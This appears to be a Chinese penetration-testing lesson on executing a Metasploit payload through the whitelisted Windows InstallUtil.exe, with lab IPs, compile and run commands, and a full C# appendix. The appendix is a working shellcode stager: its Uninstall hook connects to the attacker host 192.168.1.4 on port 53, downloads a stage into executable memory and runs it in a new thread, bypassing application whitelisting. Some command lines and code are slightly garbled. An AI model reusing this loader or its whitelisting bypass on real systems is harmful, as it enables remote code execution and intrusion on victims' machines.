Installutil简介:

Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。
具体参考:Windows Installer部署
https://docs.microsoft.com/zh-cn/previous-versions/2kt85ked(v=vs.120)

说明:Installutil.exe所在路径没有被系统添加PATH环境变量中,因此,Installutil命令无法识别。

基于白名单installutil.exe配置payload:

Windows 7 默认位置:

  1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

攻击机:192.168.1.4 Debian
靶机:192.168.1.3 Windows 7

配置攻击机msf:

第七十二课:基于白名单Installutil.exe执行payload第二季 - 图1

靶机执行:

靶机编译:

  1. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Ente rpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Mic opoor.exe /keyfile:C:\Users\John\Desktop\installutil.snk /unsafe C:\Users\John\Desktop\installutil.cs

第七十二课:基于白名单Installutil.exe执行payload第二季 - 图2

payload:
Micropoor.exe
第七十二课:基于白名单Installutil.exe执行payload第二季 - 图3

靶机执行:

  1. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U Micropoor.exe

第七十二课:基于白名单Installutil.exe执行payload第二季 - 图4

附录:Micropoor.cs

注:x64 payload

  1. using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;
  3. public class GQLBigHgUniLuVx {
  5. public static void Main()
  7. {
  9. while(true)
  11. {{ MessageBox.Show("doge"); Console.ReadLine();}}
  13. }
  15. } 
  17. [System.ComponentModel.RunInstaller(true)]
  19. public class esxWUYUTWShqW : System.Configuration.Install.Installer
  21. {
  23. public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu)
  25. {
  27. jkmhGrfzsKQeCG.LCIUtRN();
  29. }
  31. } 
  33. public class jkmhGrfzsKQeCG
  35. { [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF,UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI);
  37. [DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp,IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);
  39. [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);
  41. static byte[] ErlgHH(string ZwznjBJY, int KsMEeo) {
  43. IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
  45. Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
  47. try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
  49. catch { return null;}
  51. byte[] UmquAHRnhhpuE = new byte[4];
  53. XXxIoIXNCle.Receive(UmquAHRnhhpuE, 4, 0);
  55. int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE, 0);
  57. byte[] qaYyFq = new byte[kFVRSNnpj + 5];
  59. int SRCDELibA = 0;
  61. while (SRCDELibA < kFVRSNnpj)
  63. { SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA + 5, (kFVRSNnpj  SRCDELibA) < 4096 ? (kFVRSNnpj  SRCDELibA) : 4096, 0);}
  65. byte[] TvvzOgPLqwcFFv = BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
  67. Array.Copy(TvvzOgPLqwcFFv, 0, qaYyFq, 1, 4); qaYyFq[0] = 0xBF;
  69. return qaYyFq;}
  71. static void cmMtjerv(byte[] HEHUjJhkrNS) {
  73. if (HEHUjJhkrNS != null) {
  75. UInt32 WcpKfU = VirtualAlloc(0, (UInt32)HEHUjJhkrNS.Length, 0x1000, 0x40);
  77. Marshal.Copy(HEHUjJhkrNS, 0, (IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
  79. IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
  81. UInt32 wdjYKFDCCf = 0;
  83. IntPtr XVYcQxpp = IntPtr.Zero;
  85. UhxtIFnlOQatrk = CreateThread(0, 0, WcpKfU, XVYcQxpp, 0, ref wdjYKFDCCf);
  87. WaitForSingleObject(UhxtIFnlOQatrk, 0xFFFFFFFF); }} 
  89. public static void LCIUtRN() {
  91. byte[] IBtCWU = null; IBtCWU = ErlgHH("192.168.1.4", 53);
  93. cmMtjerv(IBtCWU);
  95. } }

installutil.snk 596B

Micropoor